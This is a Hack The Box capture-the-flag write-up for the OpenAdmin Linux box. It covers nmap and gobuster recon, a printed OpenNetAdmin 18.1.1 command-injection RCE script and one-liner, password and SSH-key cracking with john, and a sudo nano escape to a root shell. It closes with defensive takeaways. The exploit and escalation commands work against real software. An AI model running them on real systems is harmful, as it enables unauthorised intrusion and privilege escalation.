This page looks best with JavaScript enabled

Hack The Box :: OpenAdmin

 ·  ☕ 4 min read  ·  🧔🏻 noobintheshell


OpenAdmin is an Easy Linux box created by dmw0ng. It was released on January 4th, 2020 and retired on May 2nd, 2020. The users rated the difficulty 4.4/10 and gave an overall score of 4.5/5 to this box.

OpenAdmin Info Card
OpenAdmin Info Card

TL;DR

We discover a website that contains a broken login page link that gives access to an OpenNetAdmin instance. The installed version has a known RCE vulnerability that we exploit to get jimmy password. We log in through SSH and discover an internal website that gives out joanna SSH private-key if we can log in. We find the SHA512 hash in the source code that we easily crack. We get the private-key that is encrypted. We crack it with john and log in as joanna to get the user flag. joanna is a sudoer and can run nano with root privileges. Once in nano we can execute commands to get a root shell and grab the root flag.


Reconnaissance & Enumeration

Open Ports

An NMAP scan shows the following (partial) output:

$ sudo nmap -sS -sV -p- 10.10.10.171

PORT STATE  SERVICE  VERSION
22/tcp  open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

We discover the usual OpenSSH and Apache servers on their respective default ports.

Web discovery

The landing page is the default Apache2 page. A gobuster file/directory scan discovers 3 different websites:

$ gobuster dir -u http://10.10.10.171/ -w wordlists/big.txt
/artwork
/music
/sierra

Artwork and Sierra propose different services for start-ups. The content is, for the most part, static, except for a contact form. Music, proposes music downloads for artists and is the only with a login page:

Magic landing page
Magic landing page

However, the login page does not seem properly configured as it gives access to /ona, an instance of OpenNetAdmin v18.1.1 (see the page title), a tool to manage IP inventories:

OpenNetAdmin
OpenNetAdmin

There is a public vulnerability impacting this tool and the version that is running:

searchsploit OpenNetAdmin
searchsploit OpenNetAdmin

Gaining Access

The content of the exploit 47691.sh is short:

1
2
3
4
5
6
#!/bin/bash
URL="${1}"  
while true;do  
 echo -n "$ "; read cmd  
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1  
done

This will output a pseudo-shell where we can send commands and get the results. On macOS, the built-in head command does not support the -n flag with negative values. We can use ghead instead (brew install coreutils), and the command becomes:

$ while true;do echo -n “$ “; read cmd;curl –silent -d “xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo "BEGIN";${cmd};echo "END"&xajaxargs[]=ping” http://10.10.10.171/ona/ | sed -n -e ‘/BEGIN/,/END/ p’ | tail -n +2 | ghead -n -1;done
OpenNetAdmin exploit
OpenNetAdmin exploit

By exploring the website files, we find some credentials in the database configuration file:

database_settings.inc.php
database_settings.inc.php

There are 2 users on the system: joanna and jimmy. The password is jimmy’s and we get SSH access.


Local Reconnaissance & Enumeration

There is an internal website listening on port 52846:

internal website
internal website

The content is pretty simple, there is a login page where we see that only jimmy is allowed to log in:

/var/www/internal/index.php
/var/www/internal/index.php

The SHA512 hash does not correspond to jimmy password. Once logged-in, we access joanna SSH private-key:

/var/www/internal/main.php
/var/www/internal/main.php

Privilege Escalation

User pivoting

We can crack the SHA512 hash online:

CrackStation result
CrackStation result

And retrieve the private-key:

$ curl -XPOST localhost:52846 -d “login&username=jimmy&password=Revealed” -L -v

The redirection to /main.php does not seem to work though…but we get the session cookie that we can use:

$ curl localhost:52846/main.php -H “PHPSESSID=po0mav9u27apgapafu0r518aj2” -v

main.php page
main.php page

We grab the encrypted private-key of joanna. There is one last message at the bottom of the page:

Don’t forget your “ninja” password

We save the key and prepare it for cracking with ssh2john.py:

$ ssh2john.py joanna_key > hash.txt

Then we crack it with john:

$ john hash.txt --wordlist=wordlists/rockyou.txt

The password is: bloodninjas. We log in through SSH and get the user flag:

$ ssh -i joanna_key joanna@10.10.10.171
joanna@openadmin:~$ cat user.txt
c9b2************************1b5f

Root escalation

The escalation to root is fairly simple. joanna is a sudoer and can run nano as root:

sudo -l
sudo -l

GTFObins has the solution to spawn a shell as root:

sudo /bin/nano /opt/priv
Crtl-R Crtl-X
reset; sh 1>&0 2>&0


Conclusion

This was an entry-level Linux box with no particular difficulty and a good one, in my opinion, to start pentesting. It requires basic enumeration, password/key cracking, usage of public exploits and knowledge of basic privilege escalation techniques.

As usual, here are some takeaways:

  • do not expose management tools without strong authentication and make sure your tooling is up to date,
  • enforce a strong password policy, password and keys managers, MFA and don’t re-use passwords,
  • avoid playing with sudo configuration if you are not sure of what you do and how it can be abused. Have a look at GTFObins to start with…

Resources

[1] OpenNetAdmin
https://opennetadmin.com/

[2] CrackStation
https://crackstation.net/

[3] GTFObins - Nano
https://gtfobins.github.io/gtfobins/nano/#sudo

Share on

Avatar
WRITTEN BY
noobintheshell
AppSec Engineer and CTFer